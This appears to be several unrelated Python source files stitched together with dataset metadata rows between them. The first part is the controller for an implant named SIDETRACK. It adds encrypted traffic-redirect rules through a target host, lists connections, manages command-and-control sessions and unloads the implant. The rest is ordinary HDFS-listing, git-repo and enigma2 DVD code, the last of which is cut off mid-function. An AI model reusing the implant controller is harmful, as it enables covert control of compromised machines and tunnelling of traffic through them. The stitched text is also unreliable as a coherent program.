if len(res) == 1:
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,-1,-1
elif len(res) == 2:
ports = string.split(res[1],"/")
if len(ports) != 2:
raise ValueError, host
if ports[0] == "*":
ports[0] = -1
else:
ports[0] = eval(ports[0])
if ports[1] == "*":
ports[1] = -1
else:
ports[1] = eval(ports[1])
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,ports[0],ports[1]
else:
raise ValueError, host
def run(self,protocol,attacker,target,
opt0=None,opt1=None,opt2=None,opt3=None,opt4=None,opt5=None,
opt6=None,opt7=None,opt8=None,opt9=None,first=1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg,0)
optList = [opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9]
allProtoAT = 0
allProtoTA = 0
allRedir = 0
ttl_reset = 1
ttl_mod = 0
munge = 1
encrypt = 0
afix = 1
tfix = 1
ident = 0
seq = 0
insert = 0
samesum = 0
longevity = 14400
conn_to = 14400
cmd = None
localredir = 0
if first:
munge = 0
encrypt = 1
protocol = self.parseProto(protocol)
if protocol == 0:
allRedir = 1
host,A_ip,A_port,SA_port = self.parseHostInfo(attacker)
host2,T_ip,T_port,ST_port = self.parseHostInfo(target)
if host != None:
hpn = host.implant.parent.name
myname = host.name
attacker = re.sub(myname,hpn,attacker)
cmd = host.GetCommand('rediradd')
res = cmd.run(protocol,attacker,\
"%s:%d/%d"%(self.implant.session.target.ip,SA_port,A_port),\
opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9,0)
if res[0] == 0:
return res
if res[2] != 0 and cmd.implant.session.target.hasAnotherAddress == 1:
A_ip = struct.pack("!L",res[2])
if SA_port == -1 and T_port != -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if SA_port != -1 and T_port == -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if ST_port == -1 and A_port != -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if ST_port != -1 and A_port == -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if SA_port == -1 and T_port == -1:
allProtoAT = 1
SA_port = 0
T_port = 0
if ST_port == -1 and A_port == -1:
allProtoTA = 1
ST_port = 0
A_port = 0
# Parse the args
i=0
while i < len(optList):
if optList[i] == None:
break
elif string.upper(optList[i])[:3] == '-TT':
i = i+1
if type(optList[i]) == type(1):
ttl_mod = optList[i]
if optList[i] < 0:
ttl_reset = 0
else:
ttl_reset = 1
elif string.upper(optList[i])[:1] == 'R':
ttl_mod = 0
ttl_reset = 1
elif optList[i][0] == '+' or optList[i][0] == '-':
ttl_mod = eval(optList[i])
ttl_reset = 0
else:
raise ValueError, optList[i]
#if ttl_reset == 0:
# ttl_mod = struct.pack("!H",ttl_mod)
#else:
# ttl_mod = struct.pack("!h",ttl_mod)
elif string.upper(optList[i])[:2] == '-I':
i = i+1
insert = optList[i]
elif string.upper(optList[i])[:2] == '-L':
i = i+1
longevity = self.ConvertTime(optList[i])
elif string.upper(optList[i])[:2] == '-C':
i = i+1
conn_to = self.ConvertTime(optList[i])
elif string.upper(optList[i])[:2] == '-N':
munge = 0
encrypt = 0
elif string.upper(optList[i])[:2] == '-E':
encrypt = 1
elif string.upper(optList[i])[:2] == '-A':
afix = 0
elif string.upper(optList[i])[:3] == '-TF':
tfix = 0
elif string.upper(optList[i])[:2] == '-S':
samesum = 1
else:
raise ValueError, optList[i]
i = i + 1
if T_ip == self.ConvertIP(self.implant.session.target.ip):
encrypt = 0
munge = 0
localredir = 1
flags = 1 | afix << 1 | tfix << 2 | ttl_reset << 3 \
| encrypt << 4 | munge << 5 | allRedir << 6 | allProtoAT << 7 \
| allProtoTA << 8 | base.ccSupport << 9 | samesum << 10
rd = crypto.GetRandom()
if localredir == 0:
ident = struct.unpack("!H",rd[0:2])[0]
if munge:
munge = struct.unpack("!L",rd[2:6])[0]
if munge & 1L == 0:
munge = munge + 1
if munge & 0xffL == 1:
munge = munge + 10
if protocol == 6 and localredir == 0 and encrypt:
seq = struct.unpack("!L", rd[22:26])[0]
if encrypt:
encrypt = struct.unpack("!LLLL",rd[6:22])
else:
encrypt = (0,0,0,0)
base.db(2, seq)
base.db(2, ident)
self.redir =REDIRECT(self,insert,longevity,conn_to,protocol,A_ip,T_ip,\
ident,seq,munge,encrypt,ttl_mod,flags,\
A_port,SA_port,T_port,ST_port)
ruleRes = self.redir.add()
if ruleRes[0] and cmd != None:
if cmd.redir != None:
cmd.redir.next = self.redir
self.redir.prev = cmd.redir
return ruleRes
#############################################################################
# REDIRLIST class
# opcode 0x24
#############################################################################
class SIDECMD_REDIRLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirlist"
self.usage = "redirlist [rule]"
self.info = "List redirect entries."
self.op = 0x24L
def parseReturn(self):
self.ret, self.rule, self.longevity, self.conn_to, \
self.A_ip, self.T_ip, self.flags = \
struct.unpack("!LLLLLLH",self.data[:26])
self.ttl_mod = struct.unpack("!H",'\000'+self.data[26:27])[0]
self.protocol = struct.unpack("!H", '\000'+self.data[27:28])[0]
self.conns, self.ATcount, self.TAcount, self.seen, self.munge, \
self.A_port, self.SA_port, self.T_port, self.ST_port, \
self.seq = struct.unpack("!LLLLLHHHHL",self.data[28:60])
self.A_ip = self.ConvertToDot(self.A_ip)
self.T_ip = self.ConvertToDot(self.T_ip)
self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
if self.protocol == 1:
self.protocol = "ICMP"
elif self.protocol == 6:
self.protocol = "TCP"
elif self.protocol == 17:
self.protocol = "UDP"
elif self.protocol == 0:
self.protocol = "ALL"
else:
self.protocol = eval("'%d'" % (self.protocol))
if (self.flags & 0x1L):
self.active = "ACTIVE"
else:
self.active = "INACTIVE"
self.opts = ''
if not (self.flags & 0x2L):
self.opts = self.opts + '-afix '
if not (self.flags & 0x4L):
self.opts = self.opts + '-tfix '
if (self.flags & 0x400L):
self.opts = self.opts + '-samesum '
if self.flags & 0x8L:
if self.ttl_mod == 0:
self.opts = self.opts + '-ttl reset '
else:
self.opts = self.opts + '-ttl %d ' % (self.ttl_mod)
else:
if self.ttl_mod > 127:
self.opts = self.opts + '-ttl %d' % (self.ttl_mod-256)
else:
self.opts = self.opts + '-ttl +%d ' % (self.ttl_mod)
if not (self.flags & 0x30L):
self.opts = self.opts + '-nocrypto '
def outputPorts(self,attacker,flags,ip,lport,rport):
if flags & 0x40 or flags & 0x180 == 0x180:
return ip
if attacker and flags & 0x80:
rport = '*'
if attacker and flags & 0x100:
lport = '*'
if not attacker and flags & 0x80:
lport = '*'
if not attacker and flags & 0x100:
rport = '*'
if type(lport) != type('*'):
lport = '%d' %(lport)
if type(rport) != type('*'):
rport = '%d' %(rport)
return '%s:%s/%s' % (ip,lport,rport)
def outputCurrent(self):
res = '%-5d %s Connection timeout: %s Expires: %s\n' % \
(self.rule,self.active,\
self.TimeConvert(self.conn_to),self.longevity)
res = res + ' %s %s %s %s\n' % \
(self.protocol,
self.outputPorts(1,self.flags,self.A_ip,self.A_port,self.SA_port),
self.outputPorts(0,self.flags,self.T_ip,self.T_port,self.ST_port),
self.opts)
res = res + ' Connections: %-4d Last seen %s\n A->T count: %-6d T->A count: %-6d\n' % (self.conns, time.ctime(self.seen-self.implant.timediff)[4:], self.ATcount, self.TAcount)
return (1, res)
def listOne(self,rule):
self.data = struct.pack("!LL",rule,0)
self.Query()
if self.op == 0x24L and self.res == 0x01L:
self.parseReturn()
return self.outputCurrent()
else:
return (0, "Implant did not return a valid response")
def listAll(self):
out = ''
self.ret = 1
self.rule = 0
while self.ret == 1:
self.data = struct.pack("!LL",0,self.rule)
self.Query()
if self.op == 0x24L and self.res == 0x01L:
self.parseReturn()
res = self.outputCurrent()
if res[0] == 0:
return res
else:
out = out + res[1]
else:
return (0, "Error receiving result")
if self.ret == 2:
return (1, "No rules to list")
else:
return (1, out)
def run(self,rule=None):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
if rule == None:
res = self.listAll()
else:
res = self.listOne(rule)
return res
#############################################################################
# REDIRSET class
# opcode 0x25
#############################################################################
class SIDECMD_REDIRSET(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirset"
self.usage = "redirset <rule|all> <active|inactive>"
self.info = "Set a redirect rule as being active or inactive."
self.op = 0x25L
def run(self, rule, status):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
if string.upper(status[:1]) == 'A':
status = 1
elif string.upper(status[:1]) == 'I':
status = 0
i=0
while i < len(self.implant.rules):
if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
res = self.implant.rules[i].set(status)
if res[0] == 0:
return res
elif rule != 0:
break
i = i + 1
base.db(3,res[1])
if i == len(self.implant.rules) and rule != 0:
return (0, "Rule does not exist")
else:
return (1, "Rule(s) set successfully")
#############################################################################
# CONNREMOVE class
# opcode 0x28
#############################################################################
class SIDECMD_CONNREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connrm"
self.usage = "connrm <rule|all>"
self.info = "Remove a connection entry (or all connection entries)"
self.op = 0x28L
def run(self, rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x28L and self.res == 0x1L:
return (1, "Connection(s) removed successfully")
else:
return (0, "Error removing connection(s)")
#############################################################################
# CONNLIST class
# opcode 0x27
#############################################################################
class SIDECMD_CONNLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connlist"
self.usage = "connlist [-c <rule> | -r <redir>]"
self.info = "Lists a (or all) connection rules"
self.op = 0x27L
def convertState(self,state):
if state == 0:
return "INIT"
elif state == 1:
return "SYN_SENT"
elif state == 2:
return "SYN_RCVD"
elif state == 3:
return "SYN_ACK_RCVD"
elif state == 4:
return "SYN_ACK_SENT"
elif state == 5:
return "ESTABLISHED"
elif state == 6:
return "FIN_SENT"
def parseReturn(self):
self.ret,self.rule,self.redir,self.longevity = struct.unpack("!LLLL",self.data[0:16])
self.protocol = struct.unpack("!H", '\000'+self.data[16:17])[0]
sendstate = struct.unpack("!H",'\000'+self.data[17:18])[0]
recvstate = struct.unpack("!H",'\000'+self.data[18:19])[0]
sender = struct.unpack("!H",'\000'+self.data[19:20])[0]
self.at_cnt, self.ta_cnt, self.last, self.Aip, self.SAip, self.Tip,\
self.STip, self.Aport, self.SAport, self.Tport, self.STport \
= struct.unpack("!LLLLLLLHHHH",self.data[20:56])
self.leftState = ''
self.rightState = ''
if self.protocol == 6:
self.protocol = "TCP"
if sender == 1:
self.leftState = self.convertState(sendstate)
self.rightState = self.convertState(recvstate)
else:
self.leftState = self.convertState(recvstate)
self.rightState = self.convertState(sendstate)
elif self.protocol == 17:
self.protocol = "UDP"
else:
self.protocol = '%d' %(self.protocol)
def outputCurrent(self):
res = '%d %s Redir rule: %d Last seen: %s\n %s:%d <-%s(%d)-> %s:%d\n %s:%d <-%s(%d)-> %s:%d\n' % \
(self.rule,self.protocol,self.redir,
time.ctime(self.last+self.implant.timediff)[4:],
self.ConvertToDot(self.Aip),self.Aport,
self.leftState,self.at_cnt,
self.ConvertToDot(self.SAip),self.SAport,
self.ConvertToDot(self.STip),self.STport,
self.rightState,self.ta_cnt,
self.ConvertToDot(self.Tip),self.Tport)
return (1,res)
def listAll(self,redir):
out = ''
self.ret = 1
self.rule = 0
while self.ret == 1:
self.data = struct.pack("!LLL",0,self.rule,redir)
self.Query()
if self.op == 0x27L and self.res == 0x01L:
self.parseReturn()
res = self.outputCurrent()
if res[0] == 0:
return res
else:
out = out + res[1]
else:
return (0, "Error receiving result")
if self.ret == 2:
return (1,"No connections to list")
else:
return (1,out)
def listOne(self,rule):
self.data = struct.pack("!LLL",rule,0,0)
self.Query()
if self.op == 0x27L and self.res == 0x01L:
self.parseReturn()
return self.outputCurrent()
else:
return (0, "Implant did not return a valid response")
def run(self, option=None, value=None):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
rule = 0
redir = 0
if option != None:
if option == '-c':
rule = value
elif option == '-r':
redir = value
else:
raise TypeError, option
if rule == 0:
res = self.listAll(redir)
else:
res = self.listOne(rule)
return res
#############################################################################
# REDIRREMOVE class
# opcode 0x26
#############################################################################
class SIDECMD_REDIRREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirrm"
self.usage = "redirrm <rule|all>"
self.info = "Remove a redirect rule (or all redirect rules)"
self.op = 0x26L
def run(self, rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
removed = 0
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
i = 0
while i < len(self.implant.rules):
if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
res = self.implant.rules[i].remove()
if res[0] == 0:
return res
removed = 1
i = i - 1
i = i + 1
if removed == 0 or rule == 0:
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x26L and self.res == 0x1L:
return (1, "Rule(s) removed successfully")
else:
return (0, "Error removing rule(s)")
else:
return res
#############################################################################
# CCLIST class
# opcode 0x29
#############################################################################
class SIDECMD_CCLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "cclist"
self.usage = "cclist"
self.info = "List all of the command and control sessions"
self.op = 0x29L
def parseReturn(self):
self.more,self.rule,self.longevity,self.srcip,self.dstip,\
self.srcport,self.dstport = struct.unpack("!LLLLLHH",self.data[0:24])
if self.more & 2L:
self.current = "(CURRENT) "
else:
self.current = ""
self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
self.srcip = self.ConvertToDot(self.srcip)
self.dstip = self.ConvertToDot(self.dstip)
def displayCurrent(self):
# STUB: Make this better!
if self.rule == 0xffffffffL:
return ""
res = "%d %s%s:%d<->%s:%d Expires: %s\n" % \
(self.rule,self.current,self.srcip,self.srcport,\
self.dstip,self.dstport,self.longevity)
return res
def run(self):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
res = ""
last = 0L
self.more = 1
while self.more & 1L:
self.data = struct.pack("!L",last)
self.Query()
if self.op == 0x29L and self.res == 0x1L:
self.parseReturn()
res = self.displayCurrent() + res
last = self.rule
else:
return (0, "Error getting CC rules")
return (1,res)
#############################################################################
# CCREMOVE class
# opcode 0x2a
#############################################################################
class SIDECMD_CCREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "ccremove"
self.usage = "ccremove <rule>"
self.info = "Remove a command and control session (see also: done)"
self.op = 0x2aL
def run(self,rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x2aL and self.res == 0x1L:
return (1, "Session removed successfully")
else:
return (0, "Unable to remove CC session (note: you cannot remove yourself, see: done)")
#############################################################################
# UNLOAD class
# opcode 0x30
#############################################################################
class SIDECMD_UNLOAD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "stunload"
self.usage = "stunload <magic>"
self.info = "Remove SIDETRACK from the target"
self.op = 0x30L
def run(self, magic):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
self.data = struct.pack("!L",magic);
self.Query()
if self.op == 0x30L and self.res == 0x1L:
return (1, "SIDETRACK successfully removed from target")
else:
return (0, "Cannot remove SIDETRACK");
base.RegisterImplant('SIDETRACK', SIDETRACK)
class REDIRECT(SIDECMD):
def __init__(self, cmd, next, longevity, connection_timeout, protocol,\
A_ip, T_ip, ident, seq, munge, crypto_key, ttl_mod, flags, \
A_port, SA_port, T_port, ST_port):
SIDECMD.__init__(self)
self.protocol = cmd.protocol
self.implant = cmd.implant
self.session = cmd.implant.session
self.target = cmd.implant.session.target
self.longevity = longevity
self.nextRule = next
self.connection_timeout = connection_timeout
self.proto = protocol
self.A_ip = A_ip
self.T_ip = T_ip
self.ident = ident
self.seq = seq
self.munge = munge
self.crypto_key = crypto_key
self.ttl_mod = ttl_mod
self.flags = flags
self.A_port = A_port
self.SA_port = SA_port
self.T_port = T_port
self.ST_port = ST_port
self.added = 0
self.localRuleNum = None
self.remoteRuleNum = None
self.prev = None
self.next = None
self.ccPassthru = None
def remove(self,direction=0):
if self.added == 0:
return (0, "Rule does not exist")
if self.ccPassthru != None:
cmd = self.ccPassthru.GetCommand('done')
cmd.run()
if direction != 1 and self.next != None:
res = self.next.remove(2)
if res[0] == 0:
return (res[0], "Rule could not be removed: " + res[1])
self.next = None
if self.remoteRuleNum != None:
self.op = 0x26L
self.data = struct.pack("!L",self.remoteRuleNum)
self.Query()
if self.op == 0x26L and self.res == 0x1L:
base.redir.delete(self.localRuleNum)
self.added = 0
self.localRuleNum = None
self.implant.rules.remove(self)
if direction != 2 and self.prev != None:
res = self.prev.remove(1)
if res[0] == 0:
return (0,"Rule %d removed: %s"%(self.remoteRuleNum,res[1]))
return (1, "Rule %d removed"%(self.remoteRuleNum))
else:
return (0, "Rule could not be removed")
else:
base.redir.delete(self.localRuleNum)
return (1, "Local rule removed")
def set(self,value,direction=0):
if self.added == 0:
return (0, "Rule does not exist")
if direction != 1 and self.next != None:
res = self.next.set(value,2)
if res[0] == 0:
return(res[0], "Rule could not be set: " + res[1])
if self.remoteRuleNum:
self.op = 0x25L
self.data = struct.pack("!LH",self.remoteRuleNum, value)
self.Query()
if self.op == 0x25L and self.res == 0x1L:
base.redir.set(self.localRuleNum, value)
if direction != 2 and self.prev != None:
res = self.prev.set(value,1)
if res[0] == 0:
return (0,"Rule %d set: %s"%(self.remoteRuleNum,res[1]))
return (1, "Rule %d set"%(self.remoteRuleNum))
else:
return (0, "Rule could not be set")
else:
base.redir.set(self.localRuleNum, value)
return (1, "Local rule set")
def add(self, addremote=1):
if self.added == 1:
return (0, "Rule already exists", 0)
AT_ip = 0
if addremote:
self.op = 0x23L
self.data = struct.pack("!LLL",self.nextRule, self.longevity,\
self.connection_timeout)
self.data = self.data + self.A_ip + self.T_ip
self.data = self.data + struct.pack("!HHLLLLLHHHHHHL",self.flags,\
(self.ttl_mod << 8 | self.proto), self.munge,\
self.crypto_key[0],self.crypto_key[1],self.crypto_key[2],\
self.crypto_key[3], self.ident, 0, self.A_port, \
self.SA_port, self.T_port, self.ST_port, self.seq)
self.Query()
if self.op == 0x23L and self.res == 0x01L:
self.remoteRuleNum = struct.unpack("!L", self.data[0:4])[0]
AT_ip = struct.unpack("!L", self.data[4:8])[0]
self.ST_ip = self.data[4:8]
res = base.redir.redir(self.longevity,self.connection_timeout,\
self.ConvertIP(self.target.ip), \
self.T_ip,\
self.seq, self.munge, self.crypto_key, \
self.flags, self.A_port, self.SA_port,\
self.ident, self.proto)
if res < 1:
self.op = 0x26L
self.data = struct.pack("!L",self.remoteRuleNum)
self.Query()
if self.op == 0x26L and self.res == 0x1L:
self.remoteRuleNum = None
return (0, "Local rule could not be added", AT_ip)
else:
return (0, "Local rule could not be added, remote rule may still exist", AT_ip)
self.localRuleNum = res
self.added = 1
self.implant.rules.append(self)
return (self.remoteRuleNum, "Rule %d added" %(self.remoteRuleNum), AT_ip)
else:
return (0, "Remote rule could not be added", AT_ip)
else:
self.remoteRuleNum = None
res = base.redir.redir(self.longevity,self.connection_timeout,\
self.ConvertIP(self.target.ip), \
self.T_ip,\
self.seq, self.munge, self.crypto_key, \
self.flags, self.A_port, self.SA_port,\
self.ident, self.proto)
if res < 1:
return (0, "Local rule could not be added", 0)
self.added = 1
self.localRuleNum = res
return (1, "Local rule added", 0)
| unlicense | 5,147,977,936,728,221,000 | 35.501265 | 289 | 0.462023 | false | 3.780741 | false | false | false |
simondolle/hls-autocomplete | hls_autocomplete/parse.py | 1 | 5470 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import datetime
from time import strptime
import re
import os
import json
class FileStatus(object):
def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None):
self.path = path
self.rights = rights
self.nbFiles = nbFiles
self.owner = owner
self.group = group
self.size = size
self.date = date
self.relpath = relpath
def __eq__(self, other):
return (self.path == other.path and self.rights == other.rights and
self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and
self.size == other.size and self.date == other.date)
def is_dir(self):
return self.rights.startswith("d")
def __str__(self):
return self.to_str(0, 0, 0, 0, 0, 0, 0)
def to_str(self, rights_width, nbFiles_width, owner_width, group_width, size_width, date_width, path_with):
if self.is_dir:
nb_files = "-"
else:
nb_files = str(self.nbFiles)
result = "%s %s %s %s %s %s %s" % (self.rights.ljust(rights_width),
nb_files.ljust(nbFiles_width),
self.owner.ljust(owner_width),
self.group.ljust(group_width),
str(self.size).ljust(size_width),
self.date.strftime("%Y-%M-%d %H:%M").ljust(date_width),
self.path.ljust(path_with))
return result.encode("utf-8")
def get_file_statuses_pretty_print(file_statuses):
rights_width = 0
nb_files_width = 0
owner_width = 0
group_width = 0
size_width = 0
date_width = 0
path_width = 0
if len(file_statuses) != 0:
rights_width = max([len(fs.rights) for fs in file_statuses])
nb_files_width = max([len(str(fs.nbFiles)) for fs in file_statuses])
owner_width = max([len(fs.owner) for fs in file_statuses])
group_width = max([len(fs.group) for fs in file_statuses])
size_width = max([len(str(fs.size)) for fs in file_statuses])
date_width = max([len(fs.date.strftime("%Y-%M-%d %H:%M")) for fs in file_statuses])
path_width = max([len(fs.path) for fs in file_statuses])
result = []
for file_status in file_statuses:
result.append(file_status.to_str(rights_width, nb_files_width, owner_width, group_width, size_width, date_width, path_width))
return "\n".join(result)
class LsParser(object):
def __init__(self):
pass
def parse_line(self, line):
regex = "^([rwxd@+-]+)\s+(\d+)\s+(\w+)\s+(\w+)\s+(\d+)\s+(\d+)\s+(\w+)\s+([:\d]+)\s+(/.+)$"
m = re.match(regex, line, re.UNICODE)
if m is None:
return None
rights = m.group(1)
nbFiles = int(m.group(2))
owner = m.group(3)
group = m.group(4)
size = int(m.group(5))
day = int(m.group(6))
month = m.group(7)
try:
month = strptime(month, '%b').tm_mon
except:
month = [u"jan", u"fév", u"mar", u"avr", u"mai", u"jui", u"juil", u"aoû", u"sep", u"oct", u"nov", u"déc"].index(month) + 1
try:
year = int(m.group(8))
except:
year = datetime.datetime.now().year
filename = m.group(9)
date = datetime.date(year, month, day)
return FileStatus(filename, rights, nbFiles, owner, group, size, date)
def parse(self, output):
result = [self.parse_line(line) for line in output.split("\n")]
return [p for p in result if p is not None]
class WebHdfsParser(object):
def __init__(self, path):
self.path = path
def permissions_to_unix_name(self, is_dir, rights):
is_dir_prefix = 'd' if is_dir else '-'
sticky = False
if len(rights) == 4 and rights[0] == '1':
sticky = True
rights = rights[1:]
dic = {'7': 'rwx', '6': 'rw-', '5': 'r-x', '4': 'r--', '3': '-wx', '2': '-w-', '1': '--x', '0': '---'}
result = is_dir_prefix + ''.join(dic[x] for x in rights)
if sticky:
result = result[:-1] + "t"
return result
def parse_status(self, status):
relpath = status["pathSuffix"]
path = os.path.join(self.path, relpath)
nbFiles = 0
size = status["length"]
owner = status["owner"]
group = status["group"]
is_dir = status["type"] == "DIRECTORY"
right_digits = status["permission"]
rights = self.permissions_to_unix_name(is_dir, right_digits)
parsed_date = datetime.datetime.utcfromtimestamp(int(status["modificationTime"])/1000)
date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute)
return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath)
def parse(self, output):
try:
j = json.loads(output)
except:
print output
return []
if "FileStatuses" not in j or "FileStatus" not in j["FileStatuses"]:
print j
return []
statuses = j["FileStatuses"]["FileStatus"]
result = []
for status in statuses:
result.append(self.parse_status(status))
return result
| mit | 8,956,800,245,281,798,000 | 33.821656 | 134 | 0.539601 | false | 3.488832 | false | false | false |
lipro-yocto/git-repo | subcmds/prune.py | 1 | 1907 | # Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from color import Coloring
from command import PagedCommand
class Prune(PagedCommand):
common = True
helpSummary = "Prune (delete) already merged topics"
helpUsage = """
%prog [<project>...]
"""
def Execute(self, opt, args):
all_branches = []
for project in self.GetProjects(args):
all_branches.extend(project.PruneHeads())
if not all_branches:
return
class Report(Coloring):
def __init__(self, config):
Coloring.__init__(self, config, 'status')
self.project = self.printer('header', attr='bold')
out = Report(all_branches[0].project.config)
out.project('Pending Branches')
out.nl()
project = None
for branch in all_branches:
if project != branch.project:
project = branch.project
out.nl()
out.project('project %s/' % project.relpath)
out.nl()
print('%s %-33s ' % (
branch.name == project.CurrentBranch and '*' or ' ',
branch.name), end='')
if not branch.base_exists:
print('(ignoring: tracking branch is gone: %s)' % (branch.base,))
else:
commits = branch.commits
date = branch.date
print('(%2d commit%s, %s)' % (
len(commits),
len(commits) != 1 and 's' or ' ',
date))
| apache-2.0 | -1,370,391,103,459,699,500 | 28.796875 | 74 | 0.633456 | false | 3.940083 | false | false | false |
atvcaptain/enigma2 | lib/python/Plugins/Extensions/DVDBurn/Title.py | 1 | 6455 | from __future__ import absolute_import
from Components.config import ConfigSubsection, ConfigSubList, ConfigInteger, ConfigText, ConfigSelection
from . import TitleCutter
class ConfigFixedText(ConfigText):
def __init__(self, text, visible_width=60):
ConfigText.__init__(self, default = text, fixed_size = True, visible_width = visible_width)
def handleKey(self, key):
pass
class Title:
def __init__(self, project):
self.properties = ConfigSubsection()
self.properties.menutitle = ConfigText(fixed_size = False, visible_width = 80)
self.properties.menusubtitle = ConfigText(fixed_size = False, visible_width = 80)
self.properties.aspect = ConfigSelection(choices = [("4:3", _("4:3")), ("16:9", _("16:9"))])
self.properties.widescreen = ConfigSelection(choices = [("nopanscan", "nopanscan"), ("noletterbox", "noletterbox")])
self.properties.autochapter = ConfigInteger(default = 0, limits = (0, 60))
self.properties.audiotracks = ConfigSubList()
self.DVBname = _("Title")
self.DVBdescr = _("Description")
self.DVBchannel = _("Channel")
self.cuesheet = [ ]
self.source = None
self.filesize = 0
self.estimatedDiskspace = 0
self.inputfile = ""
self.cutlist = [ ]
self.chaptermarks = [ ]
self.timeCreate = None
self.project = project
self.length = 0
self.VideoType = -1
self.VideoPID = -1
self.framerate = 0
self.progressive = -1
self.resolution = (-1, -1)
def addService(self, service):
from os import path
from enigma import eServiceCenter, iServiceInformation
from ServiceReference import ServiceReference
from time import localtime, time
self.source = service
serviceHandler = eServiceCenter.getInstance()
info = serviceHandler.info(service)
sDescr = info and info.getInfoString(service, iServiceInformation.sDescription) or ""
self.DVBdescr = sDescr
sTimeCreate = info.getInfo(service, iServiceInformation.sTimeCreate)
if sTimeCreate > 1:
self.timeCreate = localtime(sTimeCreate)
serviceref = ServiceReference(info.getInfoString(service, iServiceInformation.sServiceref))
name = info and info.getName(service) or "Title" + sDescr
self.DVBname = name
self.DVBchannel = serviceref.getServiceName()
self.inputfile = service.getPath()
self.filesize = path.getsize(self.inputfile)
self.estimatedDiskspace = self.filesize
self.length = info.getLength(service)
def addFile(self, filename):
from enigma import eServiceReference
ref = eServiceReference(1, 0, filename)
self.addService(ref)
self.project.session.openWithCallback(self.titleEditDone, TitleCutter.CutlistReader, self)
def titleEditDone(self, cutlist):
self.initDVDmenuText(len(self.project.titles))
self.cuesheet = cutlist
self.produceFinalCuesheet()
def initDVDmenuText(self, track):
s = self.project.menutemplate.settings
self.properties.menutitle.setValue(self.formatDVDmenuText(s.titleformat.getValue(), track))
self.properties.menusubtitle.setValue(self.formatDVDmenuText(s.subtitleformat.getValue(), track))
def formatDVDmenuText(self, template, track):
template = template.replace("$i", str(track))
template = template.replace("$t", self.DVBname)
template = template.replace("$d", self.DVBdescr)
template = template.replace("$c", str(len(self.chaptermarks)+1))
template = template.replace("$f", self.inputfile)
template = template.replace("$C", self.DVBchannel)
#if template.find("$A") >= 0:
audiolist = [ ]
for audiotrack in self.properties.audiotracks:
active = audiotrack.active.getValue()
if active:
trackstring = audiotrack.format.getValue()
trackstring += ' (' + audiotrack.language.getValue() + ')'
audiolist.append(trackstring)
audiostring = ', '.join(audiolist)
template = template.replace("$A", audiostring)
if template.find("$l") >= 0:
l = self.length
lengthstring = "%d:%02d:%02d" % (l/3600, l%3600/60, l%60)
template = template.replace("$l", lengthstring)
if self.timeCreate:
template = template.replace("$Y", str(self.timeCreate[0]))
template = template.replace("$M", str(self.timeCreate[1]))
template = template.replace("$D", str(self.timeCreate[2]))
timestring = "%d:%02d" % (self.timeCreate[3], self.timeCreate[4])
template = template.replace("$T", timestring)
else:
template = template.replace("$Y", "").replace("$M", "").replace("$D", "").replace("$T", "")
return template
def produceFinalCuesheet(self):
CUT_TYPE_IN = 0
CUT_TYPE_OUT = 1
